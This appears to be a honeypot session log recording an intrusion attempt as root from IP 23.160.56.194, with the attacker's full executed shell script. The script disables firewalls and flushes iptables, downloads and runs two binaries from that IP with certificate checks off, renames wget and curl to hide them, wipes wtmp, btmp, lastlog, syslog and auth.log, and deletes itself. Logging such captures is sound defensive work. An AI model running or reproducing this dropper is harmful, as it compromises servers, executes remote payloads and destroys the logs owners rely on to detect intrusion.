| IP | 23.160.56.194 |
| Country | US |
| Username | root |
| Shell | banking |
| Exec Command | #!/bin/sh
wdir="/tmp"
for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do
if [ -w "$i" ]; then
wdir="$i"
break
fi
done
cd "$wdir" || exit 1
disable_firewall() {
systemctl stop firewalld ufw >/dev/null 2>&1
systemctl disable firewalld ufw >/dev/null 2>&1
service firewalld stop >/dev/null 2>&1
service ufw stop >/dev/null 2>&1
if command -v iptables >/dev/null 2>&1; then
iptables -P INPUT ACCEPT >/dev/null 2>&1
iptables -P FORWARD ACCEPT >/dev/null 2>&1
iptables -P OUTPUT ACCEPT >/dev/null 2>&1
iptables -F >/dev/null 2>&1
iptables -X >/dev/null 2>&1
iptables -t nat -F >/dev/null 2>&1
iptables -t nat -X >/dev/null 2>&1
fi
}
disable_firewall
download_and_run() {
target_url="$1"
target_name="$2"
if [ -f "./$target_name" ] && [ -x "./$target_name" ]; then
setsid "./$target_name" >/dev/null 2>&1 &
return 0
fi
exec_bin=""
exec_args=""
if command -v good >/dev/null 2>&1; then
exec_bin="good"
exec_args="--no-check-certificate -q $target_url -O $target_name"
elif command -v cool >/dev/null 2>&1; then
exec_bin="cool"
exec_args="-skL $target_url -o $target_name"
elif command -v wget >/dev/null 2>&1; then
exec_bin="wget"
exec_args="--no-check-certificate -q $target_url -O $target_name"
elif command -v curl >/dev/null 2>&1; then
exec_bin="curl"
exec_args="-skL $target_url -o $target_name"
fi
if [ -z "$exec_bin" ]; then
apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1
yum install -y wget curl >/dev/null 2>&1
if command -v wget >/dev/null 2>&1; then
exec_bin="wget"
exec_args="--no-check-certificate -q $target_url -O $target_name"
fi
fi
if [ -n "$exec_bin" ]; then
$exec_bin $exec_args >/dev/null 2>&1
if [ -f "$target_name" ]; then
chmod +x "$target_name"
setsid "./$target_name" >/dev/null 2>&1 &
fi
fi
}
lock_tools() {
command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1
w_path=$(which wget 2>/dev/null)
if [ -n "$w_path" ]; then
case "$w_path" in
*good*) ;;
*) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;
esac
fi
c_path=$(which curl 2>/dev/null)
if [ -n "$c_path" ]; then
case "$c_path" in
*cool*) ;;
*) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;
esac
fi
}
SERVER_IP="23.160.56.194"
download_and_run "http://$SERVER_IP/p.txt" "ygl_task_p"
download_and_run "http://$SERVER_IP/r.txt" "ygl_task_r"
lock_tools
cleanup() {
for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do
if [ -f "$log" ]; then
echo > "$log" 2>/dev/null
fi
done
rm -f "$0"
}
cleanup
exit 0 |
| Score | - |
| Connected | 2026-02-22 13:48:38 UTC |
| Disconnected | 2026-02-22 13:48:38 UTC |
Session 97dda522-22b9-4870-90f9-ec3f0d0a586f
No recorded events for this session.